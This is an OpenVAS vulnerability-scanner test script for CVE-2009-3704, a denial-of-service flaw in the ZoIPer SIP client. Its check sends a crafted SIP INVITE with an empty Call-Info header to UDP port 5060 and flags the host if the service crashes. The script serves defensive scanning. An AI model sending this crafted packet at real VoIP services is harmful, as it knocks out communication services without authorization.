###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_zoiper_empty_callinfo_dos_vuln.nasl 5355 2009-10-23 16:48:26Z oct $
#
# ZoIPer Empty Call-Info Denial of Service Vulnerability
#
# Authors:
# Nikita MR <rnikita@secpod.com>
#
# Copyright:
# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(800963);
  script_version("$Revision: 1.0 $");
  script_cve_id("CVE-2009-3704");
  script_name("ZoIPer Empty Call-Info Denial of Service Vulnerability");
  desc = "
  Overview: This host is running ZoIPer and is prone to Denial of Service
  vulnerability.

  Vulnerability Insight:
  The flaw is due to an error while handling specially crafted SIP INVITE
  messages which contain an empty Call-Info header.

  Impact:
  Successful exploitation will let the attackers to cause the service to crash.

  Impact Level: Application

  Affected Software/OS:
  ZoIPer version prior to 2.24 (Windows) and 2.13 (Linux)

  Fix: Upgrade to ZoIPer version 2.24 (Windows) and 2.13 (Linux) or later,
  http://www.zoiper.com/zoiper.php

  References:
  http://secunia.com/advisories/37015
  http://xforce.iss.net/xforce/xfdb/53792
  http://packetstormsecurity.org/0910-exploits/zoiper_dos.py.txt

  CVSS Score:
    CVSS Base Score     : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P)
    CVSS Temporal Score : 3.9
  Risk factor: Medium";

  script_description(desc);
  script_summary("Check for DoS attack on ZoIPer");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2009 Intevation GmbH");
  script_family("Denial of Service");
  exit(0);
}


include("sip.inc");

zoiperPort = 5060;
if(!get_udp_port_state(zoiperPort)){
  exit(0);
}

banner = get_sip_banner(port:zoiperPort);
if("Zoiper" >!< banner || safe_checks()){
  exit(0);
}

soc1 = open_sock_udp(zoiperPort);
if(soc1)
{
  sndReq = string("INVITE sip:openvas@10.0.0.1 SIP/2.0","\r\n",
           "Via: SIP/2.0/UDP ", get_host_name(), ".131:1298;branch=z9hG4bKJRnTggvMGl-6233","\r\n",
           "Max-Forwards: 70","\r\n",
           "From: OpenVAS <sip:OpenVAS@", get_host_name(),".131>;tag=f7mXZqgqZy-6233","\r\n",
           "To: openvas <sip:openvas@10.0.0.1>","\r\n",
           "Call-ID: wSHhHjng99-6233@", get_host_name(),".131","\r\n",
           "CSeq: 6233 INVITE","\r\n",
           "Contact: <sip:OpenVAS@", get_host_name(),".131>","\r\n",
           "Content-Type: application/sdp","\r\n",
           "Call-Info:","\r\n",
           "Content-Length: 125","\r\n\r\n");

  send(socket:soc1, data:sndReq);
  close(soc1);
  banner = get_sip_banner(port:zoiperPort);
  if(isnull(banner)){
    security_hole(port:5060, proto:"udp");
  }
}
